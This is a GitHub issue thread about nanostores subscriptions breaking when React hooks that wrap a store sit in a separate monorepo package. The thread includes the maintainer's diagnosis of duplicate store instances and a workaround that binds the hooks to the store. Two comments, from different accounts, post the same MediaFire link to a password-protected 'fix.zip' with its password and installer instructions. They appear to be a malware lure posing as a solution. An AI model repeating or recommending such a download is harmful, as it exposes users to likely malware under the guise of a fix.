### ISSUE TITLE
Use in a monorepo with hooks packages wrapping the store

### ISSUE THREAD

**Issue by tyom** [nanostores/react#28]
I have encountered an issue in a monorepo setup. I created a package with nanostore that has some logic including subscriptions to the atoms. I created another package which wraps the store into custom React hooks that I would like to export as an API to access the store data. However, the consumer app loses the atom subscriptions when used via custom hooks. But it works when the custom hook is created in the consumer app.

Please see this [minimal reproducible example repo](https://github.com/tyom/nanostores-monorepo-issue).

* Clone, run `pnpm install` and `pnpm start`;
* Go to the app in the browser and open the console;
* Observe how the two hooks affect the subscription.

The first button increments the count within React component but does nothing for the subscription outside. The second button updates the count in both React component and the subscription outside of React (browser console).

I assumed that the issue lies somewhere around the multiple version of the store being used but no matter what I tried with peer dependencies doesn't help.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ai** [comment]
Hi. I will try to look during the week.

**Comment by ai** [comment]
Yes, seems like it is not a Nano Store issue but pnpm (in a way).

Since we have a multiple packages with the store, we will have 2 different stores. It is hard to image what we can do with that on Nano Stores side.

I suggest export `createStore` from store’s package and create all stores inside the app.

**Comment by tyom** [comment]
Thanks for looking into this, Andrey.

To avoid changing the store package, as it could be used directly for non-React app I think the [hooks package](https://github.com/tyom/nanostores-monorepo-issue/commit/50ed536a99bdf41b8a3259806bba5617723c0046) could instead export an initialisation function that would accept the store as argument and enclose it for hooks. 

What do you think of this approach?

**Comment by tyom** [comment]
I ended up exporting a binding function from the React hooks package that would then be bound with the store in the app.

```ts
import { store } from '@monorepo/my-store';
import { bindStore } from '@monorepo/my-react-hooks';

export const { useCounter } = bindStore(store);
```

**Comment by marcomuser** [comment]
I think it should be possible as well to scope the atom to the react app via a react context. See (note: the article describes this pattern for zustand but it should work the same way for nanostores): https://tkdodo.eu/blog/zustand-and-react-context
